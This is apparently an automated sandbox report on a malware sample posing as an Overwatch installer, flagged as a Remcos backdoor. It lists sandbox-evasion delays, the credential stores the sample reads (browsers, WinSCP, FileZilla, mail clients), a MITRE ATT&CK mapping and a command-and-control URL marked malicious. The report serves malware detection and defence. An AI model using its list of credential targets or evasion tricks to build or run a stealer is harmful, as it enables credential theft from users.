Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Window / User API: threadDelayed 8049	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Window / User API: threadDelayed 995	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Window / User API: threadDelayed 3336	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Window / User API: threadDelayed 5802	Jump to behavior

Source: C:\Users\user\Desktop\Overwatch-Installer.exe TID: 6556	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe TID: 6556	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe TID: 6556	Thread sleep time: -168000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe TID: 6556	Thread sleep time: -120735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe TID: 6556	Thread sleep time: -995000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe TID: 5456	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe TID: 5456	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe TID: 5456	Thread sleep time: -3336000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe TID: 5456	Thread sleep time: -87030s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

Code function: 0_2_05BF6B52 GetSystemInfo,

0_2_05BF6B52

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: nefgd.exe, 00000004.00000002.2461493329.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: nefgd.exe, 00000004.00000002.2461493329.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: Overwatch-Installer.exe, 00000000.00000002.4463340564.000000000120D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: nefgd.exe, 00000003.00000002.4463130688.0000000001768000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

Code function: 0_2_052F1D68 LdrInitializeThunk,

0_2_052F1D68

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 9900

Jump to behavior

Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <br><span style=font-size:14px;font-style:normal;text-decoration:none;text-transform:none;color:#0099cc;>[Program Manager]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (09/01/2024 16:04:26)</span></span><br>

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	File opened: C:\FTP Navigator\Ftplist.txt			Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

Key opened: HKEY_CURRENT_USER\Software\Paltalk

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior

Source: Yara match	File source: Overwatch-Installer.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Overwatch-Installer.exe.aaaf90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Overwatch-Installer.exe.a90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2009514442.0000000000A92000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4464189616.0000000003631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Overwatch-Installer.exe PID: 7160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nefgd.exe PID: 5952, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	21 Input Capture	25 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	12 Process Injection	1 Obfuscated Files or Information	2 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	1 Software Packing	1 Credentials In Files	111 Security Software Discovery	Distributed Component Object Model	1 Email Collection	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	21 Input Capture	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	51 Virtualization/Sandbox Evasion	VNC	1 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	51 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Overwatch-Installer.exe	61%	Virustotal		Browse
Overwatch-Installer.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos
Overwatch-Installer.exe	100%	Avira	TR/Spy.Agent.lkofd
Overwatch-Installer.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	100%	Avira	TR/Spy.Agent.lkofd
C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
checkip.dyndns.com	0%	Virustotal		Browse
checkip.dyndns.org	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://plantain-elk-b8pt.squarespacd~y	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd60	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdN6	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdVS	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdfb	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdfO	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdF1	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd~i	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdnZ	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd~a	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdN2	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespace.com7	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdf~	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdz	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd.G	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdVp	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdFa	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd6R	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd~	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdr	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdFW	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd6H	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdVh	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd&9	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdv	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdj	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdNW	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdn	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdb	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd67	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdvx	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd&)	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdfi	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdf	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespace.com/api/comment/LikeComment	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdFM	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdj%	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd.c	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdr(	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd6m	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd.Z	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespace.com/api/comment/LikeComment	0%	Virustotal		Browse
http://go.microsoft.LinkId=42127	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdJ#	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdrD	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdb5	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdR&	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdzO	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespace.com$	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd.w	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdzE	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdj6	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdz;	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdRL	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdB=	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd2.	0%	Avira URL Cloud	safe
http://www.google.com/get/noto/	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdBA	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdRB	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdzj	0%	Avira URL Cloud	safe
http://DynDns.com	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdB3	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdR;	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdbQ	0%	Avira URL Cloud	safe
http://Paltalk.com	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdB%	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdrW	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdbH	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdZt	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdJe	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdJg	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespace.com	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd:X	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdRq	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd2E	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdbu	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd:O	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdJK	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdrz	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdbe	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdrs	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdRV	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdBG	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdv/	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd~9	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdv5	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd:l	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacdJs	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd:n	0%	Avira URL Cloud	safe
http://go.microsoft.	0%	Avira URL Cloud	safe
https://plantain-elk-b8pt.squarespacd2a	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
plantain-elk-b8pt.squarespace.com	198.185.159.177	true	true		unknown
checkip.dyndns.com	193.122.6.168	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://plantain-elk-b8pt.squarespace.com/api/comment/LikeComment	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://plantain-elk-b8pt.squarespacd60	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd~y	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdfb	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdVS	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdN6	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdfO	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdF1	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd~i	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdnZ	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd~a	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdN2	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespace.com7	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdf~	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdz	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd.G	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdVp	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdFa	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd6R	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd~	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdr	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdFW	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdfw	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://plantain-elk-b8pt.squarespacd6H	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdVh	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd&9	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdv	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdj	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdNW	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdn	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdb	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd67	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdvx	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd&)	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdfi	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdf	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdFM	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdj%	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd.c	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
